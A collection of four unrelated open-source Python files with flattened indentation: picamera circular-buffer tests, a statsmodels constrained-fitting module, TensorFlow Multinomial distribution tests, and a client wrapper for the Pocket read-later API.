# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import mock
try:
from itertools import accumulate
except ImportError:
def accumulate(iterable):
it = iter(iterable)
total = next(it)
yield total
for element in it:
total += element
yield total
import pytest
from picamera.encoders import PiVideoFrame, PiVideoFrameType
from picamera.streams import CircularIO, PiCameraCircularIO
def test_init():
stream = CircularIO(10)
assert stream.readable()
assert stream.writable()
assert stream.seekable()
assert stream.size == 10
assert stream.tell() == 0
with pytest.raises(ValueError):
CircularIO(-1)
def test_seek_tell():
stream = CircularIO(10)
assert stream.tell() == 0
stream.write(b'defghijklm')
assert stream.tell() == 10
stream.seek(0)
assert stream.tell() == 0
stream.seek(4, io.SEEK_CUR)
assert stream.tell() == 4
stream.seek(0, io.SEEK_END)
assert stream.tell() == 10
with pytest.raises(ValueError):
stream.seek(-20, io.SEEK_END)
def test_read():
stream = CircularIO(10)
stream.write(b'abcdef')
stream.write(b'ghijklm')
stream.seek(0)
assert stream.read(1) == b'd'
assert stream.read(4) == b'efgh'
assert stream.read() == b'ijklm'
assert stream.tell() == 10
assert stream.read() == b''
stream.seek(0)
assert stream.read() == b'defghijklm'
def test_read1():
stream = CircularIO(10)
stream.write(b'abcdef')
stream.write(b'ghijklm')
stream.seek(0)
assert stream.read1() == b'def'
stream.seek(0)
assert stream.read1(5) == b'def'
assert stream.read1(3) == b'ghi'
assert stream.read1() == b'jklm'
assert stream.read1() == b''
def test_write():
stream = CircularIO(10)
stream.write(b'')
assert stream.tell() == 0
assert stream.getvalue() == b''
stream.seek(2)
stream.write(b'abc')
assert stream.getvalue() == b'\x00\x00abc'
assert stream.tell() == 5
stream.write(b'def')
assert stream.getvalue() == b'\x00\x00abcdef'
assert stream.tell() == 8
stream.write(b'ghijklm')
assert stream.getvalue() == b'defghijklm'
assert stream.tell() == 10
stream.seek(1)
stream.write(b'aaa')
assert stream.getvalue() == b'daaahijklm'
assert stream.tell() == 4
stream.seek(-2, io.SEEK_END)
stream.write(b'bbb')
assert stream.tell() == 10
assert stream.getvalue() == b'aaahijkbbb'
def test_truncate():
stream = CircularIO(10)
stream.write(b'abcdef')
stream.write(b'ghijklm')
stream.seek(8)
stream.truncate()
stream.seek(0, io.SEEK_END)
assert stream.tell() == 8
stream.seek(10)
stream.truncate()
stream.seek(8)
assert stream.read() == b'\x00\x00'
stream.truncate(4)
stream.seek(0)
assert stream.read() == b'defg'
with pytest.raises(ValueError):
stream.truncate(-1)
def generate_frames(s, index=0):
# Generates a sequence of mock frame data and their corresponding
# PiVideoFrame meta-data objects.
pos = 0
timestamp = 0
for data in s:
if data == 'k':
pos += 1
yield data.encode('ascii'), PiVideoFrame(
index=index,
frame_type=PiVideoFrameType.key_frame,
frame_size=1,
video_size=pos,
split_size=pos,
timestamp=timestamp,
complete=False)
pos += 1
yield data.encode('ascii'), PiVideoFrame(
index=index,
frame_type={
'f': PiVideoFrameType.frame,
'k': PiVideoFrameType.key_frame,
'h': PiVideoFrameType.sps_header,
'm': PiVideoFrameType.motion_data,
}[data],
frame_size={
'f': 1,
'k': 2,
'h': 1,
'm': 1,
}[data],
video_size=pos,
split_size=pos,
timestamp=timestamp,
complete=True)
index += 1
timestamp += 1000000
def test_camera_stream_init():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
with pytest.raises(ValueError):
PiCameraCircularIO(None, size=1)
with pytest.raises(ValueError):
PiCameraCircularIO(camera)
with pytest.raises(ValueError):
PiCameraCircularIO(camera, size=1, seconds=1)
assert PiCameraCircularIO(camera, seconds=1, bitrate=1024).size == 1024 // 8
def test_camera_stream_frames():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
frames = []
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
if frame.complete:
frames.append(frame)
stream.write(data)
assert stream.getvalue() == b'hkkffkkff'
assert list(stream.frames) == frames
assert list(reversed(stream.frames)) == frames[::-1]
def test_camera_stream_frames_trunc_right():
# We don't officially support this but the code should work if entire
# frames are truncated (without leaving partial frame data) which is what
# we're testing for here (of course, the resulting H.264 stream won't be
# valid, but we're not testing that...)
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
frames = []
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
if frame.complete:
frames.append(frame)
stream.write(data)
stream.seek(7)
stream.truncate()
del frames[-2:]
assert stream.getvalue() == b'hkkffkk'
assert list(stream.frames) == frames
assert list(reversed(stream.frames)) == frames[::-1]
def test_camera_stream_frames_trunc_left():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
frames = []
for data, frame in generate_frames('hkffkffhkff'):
encoder.frame = frame
if frame.complete:
frames.append(frame)
stream.write(data)
del frames[:3]
# As we've gotten rid of the start of the stream we need to re-calc the
# video and split sizes in the comparison meta-data
sizes = accumulate(f.frame_size for f in frames)
frames = [
PiVideoFrame(
f.index,
f.frame_type,
f.frame_size,
size,
size,
f.timestamp,
f.complete
)
for f, size in zip(frames, sizes)
]
assert stream.getvalue() == b'fkkffhkkff'
assert list(stream.frames) == frames
assert list(reversed(stream.frames)) == frames[::-1]
def test_camera_stream_clear():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
stream.write(data)
stream.clear()
assert stream.getvalue() == b''
assert list(stream.frames) == []
assert list(reversed(stream.frames)) == []
def test_camera_stream_copy_bad():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
with pytest.raises(ValueError):
PiCameraCircularIO(camera, size=10).copy_to('foo', size=1000, seconds=10)
def test_camera_stream_copy_all():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
stream.write(data)
output = io.BytesIO()
stream.copy_to(output)
assert output.getvalue() == b'hkkffkkff'
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
stream.write(data)
assert stream.getvalue() == b'fhkkffkkff'
output = io.BytesIO()
stream.copy_to(output)
assert output.getvalue() == b'hkkffkkff'
def test_camera_stream_copy_size():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
stream.write(data)
output = io.BytesIO()
stream.copy_to(output, size=5)
assert output.getvalue() == b''
stream.copy_to(output, size=10)
assert output.getvalue() == b'hkkffkkff'
def test_camera_stream_copy_seconds():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
stream.write(data)
output = io.BytesIO()
stream.copy_to(output, seconds=1)
assert output.getvalue() == b''
stream.copy_to(output, seconds=10)
assert output.getvalue() == b'hkkffkkff'
|
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 15 16:36:05 2014
Author: Josef Perktold
License: BSD-3
"""
import numpy as np
class TransformRestriction(object):
"""Transformation for linear constraints `R params = q`
Note, the transformation from the reduced to the full parameters is an
affine and not a linear transformation if q is not zero.
Parameters
----------
R : array_like
Linear restriction matrix
q : arraylike or None
values of the linear restrictions
Notes
-----
The reduced parameters are not sorted with respect to constraints.
TODO: error checking, eg. inconsistent constraints, how?
Inconsistent constraints will raise an exception in the calculation of
the constant or offset. However, homogeneous constraints, where q=0, will
can have a solution where the relevant parameters are constraint to be
zero, as in the following example::
b1 + b2 = 0 and b1 + 2*b2 = 0, implies that b2 = 0.
The transformation applied from full to reduced parameter space does not
raise and exception if the constraint doesn't hold.
TODO: maybe change this, what's the behavior in this case?
The `reduce` transform is applied to the array of explanatory variables,
`exog`, when transforming a linear model to impose the constraints.
"""
def __init__(self, R, q=None):
# The calculations are based on Stata manual for makecns
R = self.R = np.atleast_2d(R)
if q is not None:
q = self.q = np.asarray(q)
k_constr, k_vars = R.shape
self.k_constr, self.k_vars = k_constr, k_vars
self.k_unconstr = k_vars - k_constr
m = np.eye(k_vars) - R.T.dot(np.linalg.pinv(R).T)
evals, evecs = np.linalg.eigh(m)
# This normalizes the transformation so the larges element is 1.
# It makes it easier to interpret simple restrictions, e.g. b1 + b2 = 0
# TODO: make this work, there is something wrong, does not round-trip
# need to adjust constant
#evecs_maxabs = np.max(np.abs(evecs), 0)
#evecs = evecs / evecs_maxabs
self.evals = evals
self.evecs = evecs # temporarily attach as attribute
L = self.L = evecs[:, :k_constr]
self.transf_mat = evecs[:, k_constr:]
if q is not None:
# use solve instead of inv
#self.constant = q.T.dot(np.linalg.inv(L.T.dot(R.T)).dot(L.T))
try:
self.constant = q.T.dot(np.linalg.solve(L.T.dot(R.T), L.T))
except np.linalg.linalg.LinAlgError as e:
raise ValueError('possibly inconsistent constraints. error '
'generated by\n%r' % (e, ))
else:
self.constant = 0
def expand(self, params_reduced):
"""transform from the reduced to the full parameter space
Parameters
----------
params_reduced : array_like
parameters in the transformed space
Returns
-------
params : array_like
parameters in the original space
Notes
-----
If the restriction is not homogeneous, i.e. q is not equal to zero,
then this is an affine transform.
"""
params_reduced = np.asarray(params_reduced)
return self.transf_mat.dot(params_reduced.T).T + self.constant
def reduce(self, params):
"""transform from the full to the reduced parameter space
Parameters
----------
params : array_like
parameters or data in the original space
Returns
-------
params_reduced : array_like
parameters in the transformed space
This transform can be applied to the original parameters as well
as to the data. If params is 2-d, then each row is transformed.
"""
params = np.asarray(params)
return params.dot(self.transf_mat)
def transform_params_constraint(params, Sinv, R, q):
"""find the parameters that statisfy linear constraint from unconstraint
The linear constraint R params = q is imposed.
Parameters
----------
params : array_like
unconstraint parameters
Sinv : ndarray, 2d, symmetric
covariance matrix of the parameter estimate
R : ndarray, 2d
constraint matrix
q : ndarray, 1d
values of the constraint
Returns
-------
params_constraint : ndarray
parameters of the same length as params satisfying the constraint
Notes
-----
This is the exact formula for OLS and other linear models. It will be
a local approximation for nonlinear models.
TODO: Is Sinv always the covariance matrix?
In the linear case it can be (X'X)^{-1} or sigmahat^2 (X'X)^{-1}.
My guess is that this is the point in the subspace that satisfies
the constraint that has minimum Mahalanobis distance. Proof ?
"""
rsr = R.dot(Sinv).dot(R.T)
reduction = Sinv.dot(R.T).dot(np.linalg.solve(rsr, R.dot(params) - q))
return params - reduction
def fit_constrained(model, constraint_matrix, constraint_values,
start_params=None, fit_kwds=None):
# note: self is model instance
"""fit model subject to linear equality constraints
The constraints are of the form `R params = q`
where R is the constraint_matrix and q is the vector of constraint_values.
The estimation creates a new model with transformed design matrix,
exog, and converts the results back to the original parameterization.
Parameters
----------
model: model instance
An instance of a model, see limitations in Notes section
constraint_matrix : array_like, 2D
This is R in the linear equality constraint `R params = q`.
The number of columns needs to be the same as the number of columns
in exog.
constraint_values :
This is `q` in the linear equality constraint `R params = q`
If it is a tuple, then the constraint needs to be given by two
arrays (constraint_matrix, constraint_value), i.e. (R, q).
Otherwise, the constraints can be given as strings or list of
strings.
see t_test for details
start_params : None or array_like
starting values for the optimization. `start_params` needs to be
given in the original parameter space and are internally
transformed.
**fit_kwds : keyword arguments
fit_kwds are used in the optimization of the transformed model.
Returns
-------
params : ndarray ?
estimated parameters (in the original parameterization
cov_params : ndarray
covariance matrix of the parameter estimates. This is a reverse
transformation of the covariance matrix of the transformed model given
by `cov_params()`
Note: `fit_kwds` can affect the choice of covariance, e.g. by
specifying `cov_type`, which will be reflected in the returned
covariance.
res_constr : results instance
This is the results instance for the created transformed model.
Notes
-----
Limitations:
Models where the number of parameters is different from the number of
columns of exog are not yet supported.
Requires a model that implement an offset option.
"""
self = model # internal alias, used for methods
if fit_kwds is None:
fit_kwds = {}
R, q = constraint_matrix, constraint_values
endog, exog = self.endog, self.exog
transf = TransformRestriction(R, q)
exogp_st = transf.reduce(exog)
offset = exog.dot(transf.constant.squeeze())
if hasattr(self, 'offset'):
offset += self.offset
if start_params is not None:
start_params = transf.reduce(start_params)
#need copy, because we don't want to change it, we don't need deepcopy
import copy
init_kwds = copy.copy(self._get_init_kwds())
del init_kwds['offset'] # TODO: refactor to combine with above or offset_all
# using offset as keywords is not supported in all modules
mod_constr = self.__class__(endog, exogp_st, offset=offset, **init_kwds)
res_constr = mod_constr.fit(start_params=start_params, **fit_kwds)
params_orig = transf.expand(res_constr.params).squeeze()
cov_params = transf.transf_mat.dot(res_constr.cov_params()).dot(transf.transf_mat.T)
return params_orig, cov_params, res_constr
def fit_constrained_wrap(model, constraints, start_params=None, **fit_kwds):
"""fit_constraint that returns a results instance
This is a development version for fit_constrained methods or
fit_constrained as standalone function.
It will not work correctly for all models because creating a new
results instance is not standardized for use outside the `fit` methods,
and might need adjustements for this.
This is the prototype for the fit_constrained method that has been added
to Poisson and GLM.
"""
self = model # alias for use as method
#constraints = (R, q)
# TODO: temporary trailing underscore to not overwrite the monkey
# patched version
# TODO: decide whether to move the imports
from patsy import DesignInfo
# we need this import if we copy it to a different module
#from statsmodels.base._constraints import fit_constrained
# same pattern as in base.LikelihoodModel.t_test
lc = DesignInfo(self.exog_names).linear_constraint(constraints)
R, q = lc.coefs, lc.constants
# TODO: add start_params option, need access to tranformation
# fit_constrained needs to do the transformation
params, cov, res_constr = fit_constrained(self, R, q,
start_params=start_params,
fit_kwds=fit_kwds)
#create dummy results Instance, TODO: wire up properly
res = self.fit(start_params=params, maxiter=0) # we get a wrapper back
res._results.params = params
res._results.normalized_cov_params = cov
k_constr = len(q)
res._results.df_resid += k_constr
res._results.df_model -= k_constr
res._results.constraints = lc
res._results.k_constr = k_constr
res._results.results_constrained = res_constr
return res
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib import distributions
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
ds = distributions
class MultinomialTest(test.TestCase):
def setUp(self):
self._rng = np.random.RandomState(42)
def testSimpleShapes(self):
with self.test_session():
p = [.1, .3, .6]
dist = ds.Multinomial(n=1., p=p)
self.assertEqual(3, dist.event_shape().eval())
self.assertAllEqual([], dist.batch_shape().eval())
self.assertEqual(tensor_shape.TensorShape([3]), dist.get_event_shape())
self.assertEqual(tensor_shape.TensorShape([]), dist.get_batch_shape())
def testComplexShapes(self):
with self.test_session():
p = 0.5 * np.ones([3, 2, 2], dtype=np.float32)
n = [[3., 2], [4, 5], [6, 7]]
dist = ds.Multinomial(n=n, p=p)
self.assertEqual(2, dist.event_shape().eval())
self.assertAllEqual([3, 2], dist.batch_shape().eval())
self.assertEqual(tensor_shape.TensorShape([2]), dist.get_event_shape())
self.assertEqual(tensor_shape.TensorShape([3, 2]), dist.get_batch_shape())
def testN(self):
p = [[0.1, 0.2, 0.7], [0.2, 0.3, 0.5]]
n = [[3.], [4]]
with self.test_session():
dist = ds.Multinomial(n=n, p=p)
self.assertEqual((2, 1), dist.n.get_shape())
self.assertAllClose(n, dist.n.eval())
def testP(self):
p = [[0.1, 0.2, 0.7]]
with self.test_session():
dist = ds.Multinomial(n=3., p=p)
self.assertEqual((1, 3), dist.p.get_shape())
self.assertEqual((1, 3), dist.logits.get_shape())
self.assertAllClose(p, dist.p.eval())
def testLogits(self):
p = np.array([[0.1, 0.2, 0.7]], dtype=np.float32)
logits = np.log(p) - 50.
with self.test_session():
multinom = ds.Multinomial(n=3., logits=logits)
self.assertEqual((1, 3), multinom.p.get_shape())
self.assertEqual((1, 3), multinom.logits.get_shape())
self.assertAllClose(p, multinom.p.eval())
self.assertAllClose(logits, multinom.logits.eval())
def testPmfNandCountsAgree(self):
p = [[0.1, 0.2, 0.7]]
n = [[5.]]
with self.test_session():
dist = ds.Multinomial(n=n, p=p, validate_args=True)
dist.pmf([2., 3, 0]).eval()
dist.pmf([3., 0, 2]).eval()
with self.assertRaisesOpError("Condition x >= 0.*"):
dist.pmf([-1., 4, 2]).eval()
with self.assertRaisesOpError("counts do not sum to n"):
dist.pmf([3., 3, 0]).eval()
def testPmfNonIntegerCounts(self):
p = [[0.1, 0.2, 0.7]]
n = [[5.]]
with self.test_session():
# No errors with integer n.
multinom = ds.Multinomial(n=n, p=p, validate_args=True)
multinom.pmf([2., 1, 2]).eval()
multinom.pmf([3., 0, 2]).eval()
# Counts don't sum to n.
with self.assertRaisesOpError("counts do not sum to n"):
multinom.pmf([2., 3, 2]).eval()
# Counts are non-integers.
with self.assertRaisesOpError("Condition x == y.*"):
multinom.pmf([1.0, 2.5, 1.5]).eval()
multinom = ds.Multinomial(n=n, p=p, validate_args=False)
multinom.pmf([1., 2., 2.]).eval()
# Non-integer arguments work.
multinom.pmf([1.0, 2.5, 1.5]).eval()
def testPmfBothZeroBatches(self):
with self.test_session():
# Both zero-batches. No broadcast
p = [0.5, 0.5]
counts = [1., 0]
pmf = ds.Multinomial(n=1., p=p).pmf(counts)
self.assertAllClose(0.5, pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfBothZeroBatchesNontrivialN(self):
with self.test_session():
# Both zero-batches. No broadcast
p = [0.1, 0.9]
counts = [3., 2]
dist = ds.Multinomial(n=5., p=p)
pmf = dist.pmf(counts)
# 5 choose 3 = 5 choose 2 = 10. 10 * (.9)^2 * (.1)^3 = 81/10000.
self.assertAllClose(81. / 10000, pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfPStretchedInBroadcastWhenSameRank(self):
with self.test_session():
p = [[0.1, 0.9]]
counts = [[1., 0], [0, 1]]
pmf = ds.Multinomial(n=1., p=p).pmf(counts)
self.assertAllClose([0.1, 0.9], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfPStretchedInBroadcastWhenLowerRank(self):
with self.test_session():
p = [0.1, 0.9]
counts = [[1., 0], [0, 1]]
pmf = ds.Multinomial(n=1., p=p).pmf(counts)
self.assertAllClose([0.1, 0.9], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenSameRank(self):
with self.test_session():
p = [[0.1, 0.9], [0.7, 0.3]]
counts = [[1., 0]]
pmf = ds.Multinomial(n=1., p=p).pmf(counts)
self.assertAllClose(pmf.eval(), [0.1, 0.7])
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenLowerRank(self):
with self.test_session():
p = [[0.1, 0.9], [0.7, 0.3]]
counts = [1., 0]
pmf = ds.Multinomial(n=1., p=p).pmf(counts)
self.assertAllClose(pmf.eval(), [0.1, 0.7])
self.assertEqual(pmf.get_shape(), (2))
def testPmfShapeCountsStretchedN(self):
with self.test_session():
# [2, 2, 2]
p = [[[0.1, 0.9], [0.1, 0.9]], [[0.7, 0.3], [0.7, 0.3]]]
# [2, 2]
n = [[3., 3], [3, 3]]
# [2]
counts = [2., 1]
pmf = ds.Multinomial(n=n, p=p).pmf(counts)
pmf.eval()
self.assertEqual(pmf.get_shape(), (2, 2))
def testPmfShapeCountsPStretchedN(self):
with self.test_session():
p = [0.1, 0.9]
counts = [3., 2]
n = np.full([4, 3], 5., dtype=np.float32)
pmf = ds.Multinomial(n=n, p=p).pmf(counts)
pmf.eval()
self.assertEqual((4, 3), pmf.get_shape())
def testMultinomialMean(self):
with self.test_session():
n = 5.
p = [0.1, 0.2, 0.7]
dist = ds.Multinomial(n=n, p=p)
expected_means = 5 * np.array(p, dtype=np.float32)
self.assertEqual((3,), dist.mean().get_shape())
self.assertAllClose(expected_means, dist.mean().eval())
def testMultinomialVariance(self):
with self.test_session():
n = 5.
p = [0.1, 0.2, 0.7]
dist = ds.Multinomial(n=n, p=p)
expected_variances = [[9. / 20, -1 / 10, -7 / 20],
[-1 / 10, 4 / 5, -7 / 10],
[-7 / 20, -7 / 10, 21 / 20]]
self.assertEqual((3, 3), dist.variance().get_shape())
self.assertAllClose(expected_variances, dist.variance().eval())
def testMultinomialVarianceBatch(self):
with self.test_session():
# Shape [2]
n = [5.] * 2
# Shape [4, 1, 2]
p = [[[0.1, 0.9]], [[0.1, 0.9]]] * 2
dist = ds.Multinomial(n=n, p=p)
# Shape [2, 2]
inner_var = [[9. / 20, -9 / 20], [-9 / 20, 9 / 20]]
# Shape [4, 2, 2, 2]
expected_variances = [[inner_var, inner_var]] * 4
self.assertEqual((4, 2, 2, 2), dist.variance().get_shape())
self.assertAllClose(expected_variances, dist.variance().eval())
def testVarianceMultidimensional(self):
# Shape [3, 5, 4]
p = np.random.dirichlet([.25, .25, .25, .25], [3, 5]).astype(np.float32)
# Shape [6, 3, 3]
p2 = np.random.dirichlet([.3, .3, .4], [6, 3]).astype(np.float32)
ns = np.random.randint(low=1, high=11, size=[3, 5]).astype(np.float32)
ns2 = np.random.randint(low=1, high=11, size=[6, 1]).astype(np.float32)
with self.test_session():
dist = ds.Multinomial(ns, p)
dist2 = ds.Multinomial(ns2, p2)
variance = dist.variance()
variance2 = dist2.variance()
self.assertEqual((3, 5, 4, 4), variance.get_shape())
self.assertEqual((6, 3, 3, 3), variance2.get_shape())
def testSampleUnbiasedNonScalarBatch(self):
with self.test_session() as sess:
dist = ds.Multinomial(
n=5.,
logits=math_ops.log(2. * self._rng.rand(4, 3, 2).astype(np.float32)))
n = int(3e3)
x = dist.sample(n, seed=0)
sample_mean = math_ops.reduce_mean(x, 0)
# Cyclically rotate event dims left.
x_centered = array_ops.transpose(x - sample_mean, [1, 2, 3, 0])
sample_covariance = math_ops.matmul(
x_centered, x_centered, adjoint_b=True) / n
[
sample_mean_,
sample_covariance_,
actual_mean_,
actual_covariance_,
] = sess.run([
sample_mean,
sample_covariance,
dist.mean(),
dist.variance(),
])
self.assertAllEqual([4, 3, 2], sample_mean.get_shape())
self.assertAllClose(actual_mean_, sample_mean_, atol=0., rtol=0.07)
self.assertAllEqual([4, 3, 2, 2], sample_covariance.get_shape())
self.assertAllClose(
actual_covariance_, sample_covariance_, atol=0., rtol=0.10)
def testSampleUnbiasedScalarBatch(self):
with self.test_session() as sess:
dist = ds.Multinomial(
n=5., logits=math_ops.log(2. * self._rng.rand(4).astype(np.float32)))
n = int(5e3)
x = dist.sample(n, seed=0)
sample_mean = math_ops.reduce_mean(x, 0)
x_centered = x - sample_mean # Already transposed to [n, 2].
sample_covariance = math_ops.matmul(
x_centered, x_centered, adjoint_a=True) / n
[
sample_mean_,
sample_covariance_,
actual_mean_,
actual_covariance_,
] = sess.run([
sample_mean,
sample_covariance,
dist.mean(),
dist.variance(),
])
self.assertAllEqual([4], sample_mean.get_shape())
self.assertAllClose(actual_mean_, sample_mean_, atol=0., rtol=0.07)
self.assertAllEqual([4, 4], sample_covariance.get_shape())
self.assertAllClose(
actual_covariance_, sample_covariance_, atol=0., rtol=0.10)
if __name__ == "__main__":
test.main()
|
|
import requests
import json
from functools import wraps
class PocketException(Exception):
'''
Base class for all pocket exceptions
http://getpocket.com/developer/docs/errors
'''
pass
class InvalidQueryException(PocketException):
pass
class AuthException(PocketException):
pass
class RateLimitException(PocketException):
'''
http://getpocket.com/developer/docs/rate-limits
'''
pass
class ServerMaintenanceException(PocketException):
pass
EXCEPTIONS = {
400: InvalidQueryException,
401: AuthException,
403: RateLimitException,
503: ServerMaintenanceException,
}
def method_wrapper(fn):
@wraps(fn)
def wrapped(self, *args, **kwargs):
arg_names = list(fn.__code__.co_varnames)
arg_names.remove('self')
kwargs.update(dict(zip(arg_names, args)))
url = self.api_endpoints[fn.__name__]
payload = dict([
(k, v) for k, v in kwargs.items()
if v is not None
])
payload.update(self.get_payload())
return self.make_request(url, payload)
return wrapped
def bulk_wrapper(fn):
@wraps(fn)
def wrapped(self, *args, **kwargs):
arg_names = list(fn.__code__.co_varnames)
arg_names.remove('self')
kwargs.update(dict(zip(arg_names, args)))
wait = kwargs.get('wait', True)
query = dict(
[(k, v) for k, v in kwargs.items() if v is not None]
)
# TODO: Fix this hack
query['action'] = 'add' if fn.__name__ == 'bulk_add' else fn.__name__
if wait:
self.add_bulk_query(query)
return self
else:
url = self.api_endpoints['send']
payload = {
'actions': [query],
}
payload.update(self.get_payload())
return self.make_request(
url,
json.dumps(payload),
headers={'content-type': 'application/json'},
)
return wrapped
class Pocket(object):
'''
This class implements a basic python wrapper around the pocket api. For a
detailed documentation of the methods and what they do please refer the
official pocket api documentation at
http://getpocket.com/developer/docs/overview
'''
api_endpoints = dict(
(method, 'https://getpocket.com/v3/%s' % method)
for method in "add,send,get".split(",")
)
statuses = {
200: 'Request was successful',
400: 'Invalid request, please make sure you follow the '
'documentation for proper syntax',
401: 'Problem authenticating the user',
403: 'User was authenticated, but access denied due to lack of '
'permission or rate limiting',
503: 'Pocket\'s sync server is down for scheduled maintenance.',
}
def __init__(self, consumer_key, access_token):
self.consumer_key = consumer_key
self.access_token = access_token
self._bulk_query = []
self._payload = {
'consumer_key': self.consumer_key,
'access_token': self.access_token,
}
def get_payload(self):
return self._payload
def add_bulk_query(self, query):
self._bulk_query.append(query)
@staticmethod
def _post_request(url, payload, headers):
r = requests.post(url, data=payload, headers=headers)
return r
@classmethod
def _make_request(cls, url, payload, headers=None):
r = cls._post_request(url, payload, headers)
if r.status_code > 399:
error_msg = cls.statuses.get(r.status_code)
extra_info = r.headers.get('X-Error')
raise EXCEPTIONS.get(r.status_code, PocketException)(
'%s. %s' % (error_msg, extra_info)
)
return r.json() or r.text, r.headers
@classmethod
def make_request(cls, url, payload, headers=None):
return cls._make_request(url, payload, headers)
@method_wrapper
def add(self, url, title=None, tags=None, tweet_id=None):
'''
This method allows you to add a page to a user's list.
In order to use the /v3/add endpoint, your consumer key must have the
"Add" permission.
http://getpocket.com/developer/docs/v3/add
'''
@method_wrapper
def get(
self, state=None, favorite=None, tag=None, contentType=None,
sort=None, detailType=None, search=None, domain=None, since=None,
count=None, offset=None
):
'''
This method allows you to retrieve a user's list. It supports
retrieving items changed since a specific time to allow for syncing.
http://getpocket.com/developer/docs/v3/retrieve
'''
@method_wrapper
def send(self, actions):
'''
This method allows you to make changes to a user's list. It supports
adding new pages, marking pages as read, changing titles, or updating
tags. Multiple changes to items can be made in one request.
http://getpocket.com/developer/docs/v3/modify
'''
@bulk_wrapper
def bulk_add(
self, item_id, ref_id=None, tags=None, time=None, title=None,
url=None, wait=True
):
'''
Add a new item to the user's list
http://getpocket.com/developer/docs/v3/modify#action_add
'''
@bulk_wrapper
def archive(self, item_id, time=None, wait=True):
'''
Move an item to the user's archive
http://getpocket.com/developer/docs/v3/modify#action_archive
'''
@bulk_wrapper
def readd(self, item_id, time=None, wait=True):
'''
Re-add (unarchive) an item to the user's list
http://getpocket.com/developer/docs/v3/modify#action_readd
'''
@bulk_wrapper
def favorite(self, item_id, time=None, wait=True):
'''
Mark an item as a favorite
http://getpocket.com/developer/docs/v3/modify#action_favorite
'''
@bulk_wrapper
def unfavorite(self, item_id, time=None, wait=True):
'''
Remove an item from the user's favorites
http://getpocket.com/developer/docs/v3/modify#action_unfavorite
'''
@bulk_wrapper
def delete(self, item_id, time=None, wait=True):
'''
Permanently remove an item from the user's account
http://getpocket.com/developer/docs/v3/modify#action_delete
'''
@bulk_wrapper
def tags_add(self, item_id, tags, time=None, wait=True):
'''
Add one or more tags to an item
http://getpocket.com/developer/docs/v3/modify#action_tags_add
'''
@bulk_wrapper
def tags_remove(self, item_id, tags, time=None, wait=True):
'''
Remove one or more tags from an item
http://getpocket.com/developer/docs/v3/modify#action_tags_remove
'''
@bulk_wrapper
def tags_replace(self, item_id, tags, time=None, wait=True):
'''
Replace all of the tags for an item with one or more provided tags
http://getpocket.com/developer/docs/v3/modify#action_tags_replace
'''
@bulk_wrapper
def tags_clear(self, item_id, time=None, wait=True):
'''
Remove all tags from an item.
http://getpocket.com/developer/docs/v3/modify#action_tags_clear
'''
@bulk_wrapper
def tag_rename(self, item_id, old_tag, new_tag, time=None, wait=True):
'''
Rename a tag. This affects all items with this tag.
http://getpocket.com/developer/docs/v3/modify#action_tag_rename
'''
